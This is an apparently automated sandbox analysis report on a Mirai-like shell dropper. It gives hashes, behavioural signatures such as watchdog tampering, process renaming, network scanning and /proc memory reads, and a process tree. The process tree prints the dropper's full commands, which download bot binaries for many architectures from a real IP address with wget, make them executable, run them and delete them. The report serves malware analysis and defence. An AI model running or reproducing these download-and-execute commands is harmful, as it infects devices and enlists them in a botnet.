Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-11-2024 02:46
Static task
static1
Behavioral task
behavioral1
Sample
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
-
Size
1KB
-
MD5
476467eba539be5db3022f1ebde08841
-
SHA1
6fc462604c405f96b0823e2baa077f150b1bb33f
-
SHA256
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b
-
SHA512
c6fe968567d3e60e8ecef1152c1a389c40245ce0b9a73880a2ff895443bc272000bf76b78c252c646a4a7f737a8564476740fa82792ca9847aa1071f28e47234
Malware Config
Signatures
-
Contacts a large (62273) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
busyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxpid process 665 busybox 710 busybox 731 busybox 740 busybox 745 busybox 680 busybox 717 busybox 722 busybox 726 busybox 736 busybox 750 busybox 754 busybox -
Executes dropped EXE 3 IoCs
Processes:
jklarmjklarm5jklarm6ioc pid process /tmp/jklarm 667 jklarm /tmp/jklarm5 681 jklarm5 /tmp/jklarm6 711 jklarm6 -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
jklarm5jklarmdescription ioc process File opened for modification /dev/watchdog jklarm5 File opened for modification /dev/misc/watchdog jklarm5 File opened for modification /dev/watchdog jklarm File opened for modification /dev/misc/watchdog jklarm -
Renames itself 2 IoCs
Processes:
jklarmjklarm5pid process 667 jklarm 681 jklarm5 -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 194.36.144.87 Destination IP 51.158.108.203 -
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
Processes:
jklarmjklarm5description ioc process File opened for reading /proc/net/tcp jklarm File opened for reading /proc/net/tcp jklarm5 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 64 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
Processes:
jklarm5description ioc process File opened for reading /proc/748/maps jklarm5 File opened for reading /proc/762/maps jklarm5 File opened for reading /proc/765/maps jklarm5 File opened for reading /proc/785/maps jklarm5 File opened for reading /proc/810/maps jklarm5 File opened for reading /proc/824/maps jklarm5 File opened for reading /proc/833/maps jklarm5 File opened for reading /proc/739/maps jklarm5 File opened for reading /proc/744/maps jklarm5 File opened for reading /proc/778/maps jklarm5 File opened for reading /proc/813/maps jklarm5 File opened for reading /proc/717/maps jklarm5 File opened for reading /proc/721/maps jklarm5 File opened for reading /proc/750/maps jklarm5 File opened for reading /proc/760/maps jklarm5 File opened for reading /proc/736/maps jklarm5 File opened for reading /proc/791/maps jklarm5 File opened for reading /proc/809/maps jklarm5 File opened for reading /proc/734/maps jklarm5 File opened for reading /proc/817/maps jklarm5 File opened for reading /proc/716/maps jklarm5 File opened for reading /proc/720/maps jklarm5 File opened for reading /proc/731/maps jklarm5 File opened for reading /proc/735/maps jklarm5 File opened for reading /proc/770/maps jklarm5 File opened for reading /proc/781/maps jklarm5 File opened for reading /proc/798/maps jklarm5 File opened for reading /proc/805/maps jklarm5 File opened for reading /proc/763/maps jklarm5 File opened for reading /proc/782/maps jklarm5 File opened for reading /proc/828/maps jklarm5 File opened for reading /proc/732/maps jklarm5 File opened for reading /proc/749/maps jklarm5 File opened for reading /proc/768/maps jklarm5 File opened for reading /proc/779/maps jklarm5 File opened for reading /proc/792/maps jklarm5 File opened for reading /proc/843/maps jklarm5 File opened for reading /proc/726/maps jklarm5 File opened for reading /proc/764/maps jklarm5 File opened for reading /proc/801/maps jklarm5 File opened for reading /proc/821/maps jklarm5 File opened for reading /proc/725/maps jklarm5 File opened for reading /proc/741/maps jklarm5 File opened for reading /proc/745/maps jklarm5 File opened for reading /proc/834/maps jklarm5 File opened for reading /proc/803/maps jklarm5 File opened for reading /proc/811/maps jklarm5 File opened for reading /proc/841/maps jklarm5 File opened for reading /proc/844/maps jklarm5 File opened for reading /proc/829/maps jklarm5 File opened for reading /proc/832/maps jklarm5 File opened for reading /proc/789/maps jklarm5 File opened for reading /proc/808/maps jklarm5 File opened for reading /proc/816/maps jklarm5 File opened for reading /proc/839/maps jklarm5 File opened for reading /proc/758/maps jklarm5 File opened for reading /proc/772/maps jklarm5 File opened for reading /proc/793/maps jklarm5 File opened for reading /proc/831/maps jklarm5 File opened for reading /proc/755/maps jklarm5 File opened for reading /proc/800/maps jklarm5 File opened for reading /proc/818/maps jklarm5 File opened for reading /proc/719/maps jklarm5 File opened for reading /proc/743/maps jklarm5 -
Changes its process name 2 IoCs
Processes:
jklarmjklarm5description pid process Changes the process name, possibly in an attempt to hide itself 667 jklarm Changes the process name, possibly in an attempt to hide itself 681 jklarm5 -
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
jklarm5jklarmdescription ioc process File opened for reading /proc/net/tcp jklarm5 File opened for reading /proc/net/tcp jklarm -
Processes:
jklarm5jklarmdescription ioc process File opened for reading /proc/758/cmdline jklarm5 File opened for reading /proc/844/cmdline jklarm5 File opened for reading /proc/290/status jklarm File opened for reading /proc/463/status jklarm5 File opened for reading /proc/786/cmdline jklarm5 File opened for reading /proc/647/status jklarm5 File opened for reading /proc/719/cmdline jklarm5 File opened for reading /proc/736/cmdline jklarm5 File opened for reading /proc/762/cmdline jklarm5 File opened for reading /proc/785/cmdline jklarm5 File opened for reading /proc/169/status jklarm5 File opened for reading /proc/406/status jklarm5 File opened for reading /proc/771/cmdline jklarm5 File opened for reading /proc/795/cmdline jklarm5 File opened for reading /proc/647/status jklarm File opened for reading /proc/663/status jklarm5 File opened for reading /proc/819/cmdline jklarm5 File opened for reading /proc/822/cmdline jklarm5 File opened for reading /proc/832/cmdline jklarm5 File opened for reading /proc/836/cmdline jklarm5 File opened for reading /proc/291/status jklarm File opened for reading /proc/663/status jklarm File opened for reading /proc/260/status jklarm5 File opened for reading /proc/748/cmdline jklarm5 File opened for reading /proc/766/cmdline jklarm5 File opened for reading /proc/811/cmdline jklarm5 File opened for reading /proc/290/status jklarm5 File opened for reading /proc/419/status jklarm5 File opened for reading /proc/720/cmdline jklarm5 File opened for reading /proc/773/cmdline jklarm5 File opened for reading /proc/791/cmdline jklarm5 File opened for reading /proc/818/cmdline jklarm5 File opened for reading /proc/837/cmdline jklarm5 File opened for reading /proc/731/cmdline jklarm5 File opened for reading /proc/752/cmdline jklarm5 File opened for reading /proc/793/cmdline jklarm5 File opened for reading /proc/796/cmdline jklarm5 File opened for reading /proc/724/cmdline jklarm5 File opened for reading /proc/761/cmdline jklarm5 File opened for reading /proc/781/cmdline jklarm5 File opened for reading /proc/804/cmdline jklarm5 File opened for reading /proc/344/status jklarm File opened for reading /proc/671/status jklarm File opened for reading /proc/749/cmdline jklarm5 File opened for reading /proc/769/cmdline jklarm5 File opened for reading /proc/827/cmdline jklarm5 File opened for reading /proc/831/cmdline jklarm5 File opened for reading /proc/463/status jklarm File opened for reading /proc/300/status jklarm5 File opened for reading /proc/344/status jklarm5 File opened for reading /proc/729/cmdline jklarm5 File opened for reading /proc/800/cmdline jklarm5 File opened for reading /proc/815/cmdline jklarm5 File opened for reading /proc/823/cmdline jklarm5 File opened for reading /proc/841/cmdline jklarm5 File opened for reading /proc/270/status jklarm File opened for reading /proc/790/cmdline jklarm5 File opened for reading /proc/839/cmdline jklarm5 File opened for reading /proc/656/status jklarm File opened for reading /proc/738/cmdline jklarm5 File opened for reading /proc/742/cmdline jklarm5 File opened for reading /proc/779/cmdline jklarm5 File opened for reading /proc/783/cmdline jklarm5 File opened for reading /proc/797/cmdline jklarm5 -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
busyboxjklmipsbusyboxpid process 725 busybox 727 jklmips 728 busybox -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxbusyboxbusyboxdescription ioc process File opened for modification /tmp/jklarm busybox File opened for modification /tmp/jklarm5 busybox File opened for modification /tmp/jklarm6 busybox
Processes
-
/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh1⤵PID:654
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm -O jklarm2⤵
- Writes file to tmp directory
PID:657
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
PID:665
-
-
/tmp/jklarm./jklarm NewTel2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:667
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵PID:669
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
PID:672
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/jklarm5./jklarm5 NewTel2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:681
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵PID:703
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
PID:705
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/jklarm6./jklarm6 NewTel2⤵
- Executes dropped EXE
PID:711
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵PID:712
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm7 -O jklarm72⤵PID:716
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/jklarm7./jklarm7 NewTel2⤵PID:718
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵PID:720
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklm68k -O jklm68k2⤵PID:721
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/jklm68k./jklm68k NewTel2⤵PID:723
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵PID:724
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklmips -O jklmips2⤵
- System Network Configuration Discovery
PID:725
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/jklmips./jklmips NewTel2⤵
- System Network Configuration Discovery
PID:727
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklmpsl -O jklmpsl2⤵PID:730
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/jklmpsl./jklmpsl NewTel2⤵PID:733
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵PID:734
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklppc -O jklppc2⤵PID:735
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/jklppc./jklppc NewTel2⤵PID:737
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵PID:738
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklsh4 -O jklsh42⤵PID:739
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/jklsh4./jklsh4 NewTel2⤵PID:742
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵PID:743
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklspc -O jklspc2⤵PID:744
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/jklspc./jklspc NewTel2⤵PID:747
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵PID:748
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklx86 -O jklx862⤵PID:749
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/jklx86./jklx86 NewTel2⤵PID:751
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵PID:752
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarc -O jklarc2⤵PID:753
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/jklarc./jklarc NewTel2⤵PID:756
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵PID:757
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵PID:758
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5ccc0e90e52316a5e000734aa3ab7ccdb
SHA138974e871dea717ef4d69f3f7644284a1b2a7110
SHA256e3ad3137e9ffc774a2916f5e329689397fc156318c21d5429089e24c3df6536a
SHA512247073ec1f9b19ff2349cc4f67b05e01fc7ce472aef06851ca272c756e439205631c7fe26112cc01db9149e83af550ea5666876bd9b06ca44255ecb4d35e5c1c
-
Filesize
61KB
MD55d2923d3bb5d7daf3c286d3de1c69842
SHA1c761cc78bd7c286b8a95701c8a6c215b0ed7a41f
SHA2564b36c1e443a9b1f76c30d9e4c240cf11ba7728ef0ffb83965fe31720e7c5633e
SHA512593fb52539469a132036265869082eda84b86f4c63937f74b37efa3023a4e8b5b47cdbdcabc13c1257714762c6c25a7305f743dee5ab8c8ef55d64a64f28cda2
-
Filesize
70KB
MD5bd890549b6469679c05204c8893564d9
SHA18e4655e1e4514fc49e19d914ce0e6d482dfe2d71
SHA256e5369f948a5f127f736149c3ba45bb65d0cc463d95bdda10ae4ba428484d43a2
SHA5128cad0724fd27828f29217ebf871975a429e5192427e24390de26d234352ca8d3b429969e27220bee03cd0376613e6e69e01471c5b88e1a074857bcec522ae5c4